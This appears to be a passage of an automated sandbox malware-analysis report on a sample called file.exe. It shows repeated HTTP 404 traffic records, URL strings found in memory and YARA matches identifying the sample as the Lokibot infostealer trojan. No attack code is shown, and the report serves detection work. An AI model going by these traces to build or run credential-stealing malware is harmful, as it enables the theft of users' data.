            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: file.exe, 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: file.exe, file.exe, 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

            System Summary

            barindex
            Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
